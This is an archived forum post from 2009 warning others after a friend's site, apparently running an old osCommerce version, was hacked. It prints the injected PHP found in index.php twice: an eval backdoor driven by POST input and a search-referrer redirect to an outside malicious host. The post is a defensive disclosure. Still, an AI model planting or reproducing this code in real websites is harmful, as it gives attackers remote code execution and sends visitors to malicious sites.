spufus Posted January 14, 2009 Share Posted January 14, 2009 A friend of mine had his site hacked yesterday. I found index.php had permissions changed to 777 & this in the top line of index.php <?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}} ?><?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}} ?><?php /* Fixed in a couple of mins & no other files affected. Just a warning to others to be careful. I think he's using an old version of OSC - reckon he'll be upgrading now!! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.